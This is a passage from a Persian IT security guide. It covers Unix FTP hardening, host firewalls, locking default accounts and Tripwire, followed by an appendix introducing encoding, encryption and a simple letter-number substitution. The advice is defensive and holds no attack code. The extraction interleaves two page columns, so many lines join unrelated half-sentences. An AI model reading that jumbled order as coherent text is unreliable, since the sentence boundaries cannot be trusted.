‫‪ /etc/passwd‬ﺭﺍ ﺩﺭ ﻣﺤــﻴﻂ ‪ FTP‬ﺗﺒــﺎﺩﻝ ﻧﻜﻨﻴــﺪ‪.‬‬ ‫ﻣﻲﮔﻴﺮﻧﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ‪ bin ،uucp ،root‬ﻭ‬
‫ﺩﻳﮕﺮ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﺎﺻﻲ ﻗﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ‬ ‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺩﻳـﺴﻚ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺩﺭ ﻓﺎﻳــﻞ ‪ - /etc/ftpusers‬ﻛــﻪ ﺷــﺎﻣﻞ ﻓﻬﺮﺳــﺖ‬ ‫ﻣﺨﺘﻠﻒ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬

‫ﻛﺎﺭﺑﺮﺍﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ‪ FTP‬ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ‪-‬‬ ‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﻳـﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ (UNIX‬ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻭﺟــﻮﺩ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ‪ .‬ﻣﺮﺍﻗــﺐ ﻣﺠــﻮﺯ ﺩﺳﺘﺮﺳــﻲ ﺑــﻪ‬ ‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﻨﺎﺳــﺒﻲ ﺗﻌﻴــﻴﻦ ﻭ ﺩﺭﺻــﻮﺭﺕ ﺍﻣﻜــﺎﻥ‬
‫ﺷﺎﺧﻪﻫﺎ‪ ١٣٠‬ﻭ ﻣﺎﻟﻜﻴﺖ‪ ١٣١‬ﺁﻧﻬﺎ ﺩﺭ ﻣﺤﻴﻂ ‪ FTP‬ﺑﺎﺷﻴﺪ‪ .‬ﺍﺯ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻣﻨﺪﻧﺪ ﺭﺍ‬
‫ﺍﻧﺠﺎﻡ ‪ download‬ﺗﻮﺳﻂ ﻣـﺴﻴﺮﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺍﻧﺠـﺎﻡ‬ ‫ﺗﻨﻬﺎ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﺓ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪129 Anonymous FTP‬‬


‫‪130 Directory Permission‬‬ ‫‪127 Root User‬‬
‫‪131 Ownership‬‬ ‫‪128 Access Control List‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠٤‬‬

‫ﺳﻴﺴﺘﻢ ﻭ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ‬ ‫‪ upload‬ﺑﻮﺳﻴﻠﻪ ﻣﺴﻴﺮﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ‪،‬‬
‫ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬ ‫ﻭ ﺑﺎﻻﺧﺮﻩ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺛﺒﺘﻬﺎﻱ ﺳـﺮﻭﻳﺲ ‪ FTP‬ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬

‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻫــﺮ ﺳﻴــﺴﺘﻢ ‪ UNIX‬ﺑﺎﻳــﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﻣﺒﺘﻨــﻲ ﺑــﺮ‬
‫‪١٣٣‬‬
‫ﻣﻴﺰﺑﺎﻥ‪ ١٣٢‬ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗـﺼﻔﻴﺔ ﺑـﺴﺘﻪﻫـﺎ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺍﺭﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﺍﮔﺮ ﻫﺴﺖ ﭼﮕﻮﻧﻪ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ‬
‫ﻻ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬ ‫ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺷــﺎﻣﻞ ‪ ipchains ،ipfw‬ﻭ ‪iptables‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜـﺮﺑﻨـﺪﻱ‬
‫ﺷﻮﻧﺪ ﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺭﺍﻩ ﻋﺒﻮﺭ ﺗﻤـﺎﻣﻲ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ‬
‫ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺗﻨﻬﺎ ﺑﻪ ﺁﻧﻬﺎﻳﻲ ﻣﺠـﻮﺯ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ‬
‫ﻣﻘﺼﺪ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪﺍﻳﺪ‪.‬‬

‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓﺮﺽ‬


‫ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺩﺍﺭﺍﻱ ﭼﻨــﺪﻳﻦ ﺣــﺴﺎﺏ‬
‫ﻛــﺎﺭﺑﺮﻱ ﭘــﻴﺶﻓــﺮﺽ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬
‫ﺟﺪﺍﮔﺎﻧﻪ ﻳﺎ ﻣﺠﻮﺯ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻣﺎﻧﻨﺪ ‪daemon ،bin‬‬
‫ﻭ ‪ uucp‬ﻭ ﻏﻴﺮﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﺓ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﺬﻛﻮﺭ ﺑﺎ ﻋﻼﻣﺖ "*" ﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ‬
‫ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑـﺎ ﻫـﻴﭻ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻧﻤـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﻫﻤﻴﻨﻜـﻪ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ﻛﻔﺎﻳـﺖ‬
‫ﻣﻲﻛﻨـﺪ؛ ﻭ ﻻﺯﻡ ﻧﻴـﺴﺖ ﻛـﺴﻲ ﺑﺘﻮﺍﻧـﺪ ﻭﺍﺭﺩ ﺣـﺴﺎﺑﻬﺎﻱ‬
‫ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮ ﮔﺮﺩﺩ )ﺍﮔﺮﭼﻪ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺭﻳﺸﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ su‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣﺴﺎﺑﻬﺎﻱ ﺩﻳﮕﺮ‬
‫ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﺪ(‪.‬‬

‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻧﺪﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬
‫ﺑﻪ ﺭﺍﻫﺒﺮ ‪ Unix‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲ ﺗـﺮﻳﻦ ﺁﻧﻬـﺎ‬
‫‪ Tripwire‬ﺍﺳﺖ ﻛﻪ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﻢ‬

‫‪132 Host-Based Firewall‬‬


‫‪133 Packet-Filtering‬‬
‫‪١٠٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻋﺪﺩ ‪ ۰۴‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪D‬‬


‫‪...‬‬
‫ﻋﺪﺩ ‪ ۲۴‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪X‬‬
‫ﻋﺪﺩ ‪ ۲۵‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪Y‬‬
‫ﻋﺪﺩ ‪ ۲۶‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪Z‬‬
‫ﺿﻤﻴﻤﺔ ‪۱‬‬
‫ﻋﺪﺩ ‪ ۲۷‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ﻓﺎﺻﻠﻪ‬ ‫ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﻋﺪﺩ ‪ ۲۸‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ‪.‬‬ ‫ﺑﺠﺎﻱ ﻧﻘﻄﻪ ﻧﻴﺰ‬
‫ﻛﺪﮔﺬﺍﺭﻱ‪ ١٣٤‬ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١٣٥‬ﻓﻨـﻮﻧﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺭﺷـﺘﻪﻫـﺎﻱ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﻛﺪ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ‪،‬‬


‫ﺣﺮﻭﻑ ﺭﺍ ﺑﻪ ﻗﺎﻟﺐ ﻭ ﺷﻜﻞ ﺩﻳﮕﺮﻱ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻛﺪﮔـﺬﺍﺭﻱ‬
‫ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺷـﻜﻠﻲ ﺍﺳـﺖ ﻛـﻪ ﻇـﺎﻫﺮ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫‪ ۱۹‬ﺭﺍ ﺑﺠﺎﻱ ‪ S‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛‬ ‫ﻣﻲﺩﻫﺪ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ؛‬
‫‪ ۰۵‬ﺭﺍ ﺑﺠﺎﻱ ‪ E‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛‬ ‫ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻧﻮﻋﻲ ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﻣﺨﻔـﻲ‬
‫‪ ۰۳‬ﺭﺍ ﺑﺠﺎﻱ ‪ C‬ﻗﺮﺍﺭ ﺩﻫﻴﺪ؛ ﻭ ‪...‬‬ ‫ﻛﺮﺩﻥ ﻣﺤﺘﻮﻳﺎﺕ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﺣﺎﻻ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﺷﺘﻪ ﺭﺍ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ‪:‬‬
‫ﻛﺪﮔﺬﺍﺭﻱ‬
‫‪19050321180920252709192709131615182001142028‬‬

‫ﺍﮔﺮ ﻣﻴﺎﻥ ﺍﺭﻗﺎﻡ ﻓﺎﺻﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴﻢ ﺧﻮﺍﻧﺎﺗﺮ ﻫﻢ ﻣﻲﺷﻮﺩ‪:‬‬ ‫ﻛﺪﮔﺬﺍﺭﻱ ﻗﺎﻟﺐ ﻣﻮﺿﻮﻉ ﺭﺍ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺮﺧﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ‪ .‬ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺑﺮﮔـﺸﺖ ﭘـﺬﻳﺮ ﺍﺳـﺖ؛‬
‫‪19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20‬‬ ‫‪١٣٦‬‬
‫‪01 14 20 28.‬‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻗﺎﻟﺐ ﻛﺪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﻌﺪﹰﺍ ﻣﻲﺗﻮﺍﻧـﺪ ﻛﺪﮔـﺸﺎﻳﻲ‬
‫ﺷﻮﺩ ﺗﺎ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺗﺒﺪﻳﻞ ﮔﺮﺩﺩ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺷﺪ‪ ،‬ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺁﻧﺮﺍ ﺑﻪ ﺣﺎﻟﺖ ﺍﻭﻝ ﺑﺎﺯ‬
‫ﻣﻲﮔﺮﺩﺍﻧﺪ‪:‬‬
‫ﻓﺮﺁﻳﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ‬
‫‪ S‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۱۹‬ﻣﻲﺷﻮﺩ؛‬
‫ﻓﺮﺽ ﻛﻨﻴﺪ ﻣﻲ ﺧﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫‪ E‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۰۵‬ﻣﻲﺷﻮﺩ؛‬
‫ﺟﻤﻠﺔ ﻋﺎﺩﻱ ﺍﻧﮕﻠﻴﺴﻲ ﺍﺳﺖ‪:‬‬
‫‪ C‬ﺟﺎﻳﮕﺰﻳﻦ ‪ ۰۳‬ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺍﻳﻨﻜﺎﺭ ﺁﻧﻘﺪﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺟﻤﻠـﺔ‬
‫ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﺁﻳﺪ‪.‬‬ ‫‪Security is important.‬‬
‫ﺍﻣﺎ ﺩﺭ ﺍﺭﺳﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ‬
‫ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﻗﺎﻡ ﺩﻫﺪﻫﻲ ﺭﺍ ﺍﺭﺳﺎﻝ ﻛﻨﻴـﺪ‪،۵ ،۴ ،۳ ،۲ ،۱ ،۰ :‬‬
‫ﻛﺎﺭﺑﺮﺩ ﺍﺻﻠﻲ ﻛﺪﮔﺬﺍﺭﻱ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺁﻥ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﺩﺭ‬ ‫‪ .۹ ،۸ ،۷ ،۶‬ﭘﺲ ﺑﺎﻳﺪ ﻳﻚ ﺗﺎﺑﻊ ﻧﮕﺎﺷﺖ ﺗﻬﻴﻪ ﻛﻨـﻴﻢ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺍﻧﺘﻘﺎﻝ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪ .‬ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺁﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﻢ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ ﺭﺍ ﺑﻪ ﺍﻋﺪﺍﺩ ﺩﻫﺪﻫﻲ ﺗﺒﺪﻳﻞ ﻛﻨـﺪ‪،‬‬
‫ﺍﺑﺘﺪﺍ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻣﺘﻮﻥ ﺑﻪ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻭ‬ ‫ﻭ ﺑﻌﺪ ﺍﺯ ﺍﺭﺳﺎﻝ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺁﻧـﺮﺍ ﻣﺠـﺪﺩﹰﺍ ﺑـﻪ ﺣﺎﻟـﺖ ﻗﺒﻠـﻲ ﺧـﻮﺩ‬
‫ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻛﺪ ‪ ASCII‬ﺑﻮﺩ ﻛﻪ ‪ ۱۲۸‬ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ‬ ‫ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﻓﺮﺩ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺗﻌـﺪﺍﺩ ﻛـﺪ ﺑـﺮﺍﻱ ﻧﻤـﺎﻳﺶ ‪ ۲۶‬ﺣـﺮﻑ ﺍﻟﻔﺒـﺎﻱ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ‪:‬‬
‫ﺍﻧﮕﻠﻴــﺴﻲ ﺑــﻪ ﺷــﻜﻞ ﻛﻮﭼــﻚ ﻭ ﺑــﺰﺭﮒ‪ ۱۰،‬ﺭﻗــﻢ‪ ،‬ﺑﺮﺧــﻲ ﺍﺯ‬
‫ﻧﺸﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ﻭﻳﺮﮔﻮﻝ‪ ،‬ﻧﻘﻄﻪ‪ ،‬ﻛﺮﻭﺷﻪ ﻭ ﻧﻴﺰ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ‬ ‫ﻋﺪﺩ ‪ ۰۱‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪A‬‬

‫ﻛﻠﻴﺪﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﺜﻞ ‪ Tab‬ﻭ ‪ End‬ﺑﻜﺎﺭ ﻣﻲﺭﻓﺘﻨﺪ‪.‬‬ ‫ﻋﺪﺩ ‪ ۰۲‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪B‬‬
‫ﻋﺪﺩ ‪ ۰۳‬ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛‬ ‫ﺑﺠﺎﻱ ‪C‬‬
‫ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﺑﺎﻧﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻓﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ‬
‫ﺍﺳﺖ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﺮﺩﺍﺯﺵ ﻛﻠﻤﻪ‪ ،‬ﻋﻜﺴﻬﺎ‬ ‫‪134 Encoding‬‬
‫ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬـﺎ ﺍﺯ ﺑﺎﻳﺘﻬـﺎﻱ ‪ ۸‬ﺑﻴﺘـﻲ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩﺍﻧـﺪ ﻭ‬ ‫‪135 Encryption‬‬
‫‪136 Decoding‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠٦‬‬

‫‪ Unicode‬ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺣﺮﻭﻑ‪ ،‬ﺷﻤﺎﺭﺓ ﻣﺠﺰﺍﻳﻲ ﺍﺧﺘﺼﺎﺹ‬ ‫ﻣﺠﻤﻮﻋﹰﺎ ‪ ۲۵۶‬ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺭﺍ ﻣﻲﺳـﺎﺯﻧﺪ‪ ،‬ﻭ ﻫﻴﭽﻴـﻚ‬
‫ﻣﻲﺩﻫﺪ‪ .‬ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﭼﻪ ﺑـﺴﺘﺮ‪ ،‬ﺑﺮﻧﺎﻣـﻪ ﻳـﺎ ﺯﺑـﺎﻧﻲ ﻣـﻮﺭﺩ‬ ‫ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ Unicode‬ﺑﺎ ﺭﻫﺒﺮﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﭼﻮﻥ‬ ‫ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻔﻬﻮﻡ ﺿﻤﺎﺋﻢ‪ ١٣٧‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫‪،Microsoft ،JustSystem ،IBM ،HP ،Apple‬‬ ‫ﻓﺎﻳﻠﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻝ ﻣـﻲ ﺷـﻮﺩ ﺍﺑﺘـﺪﺍ‬
‫‪ Unisys ،Sybase ،Sun ،SAP ،Oracle‬ﻭ‪ ...‬ﻧﻬـــــﺎﻳﻲ‬ ‫ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﺁﻥ ﺑﻪ ﺷﻜﻞ ﺣـﺮﻭﻑ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﺷﺪﻩ‪ ،‬ﻭ ﺩﺭ ﺗﻤﺎﻡ ﺑﺴﺘﺮﻫﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﺍﺳﺖ‪.‬‬
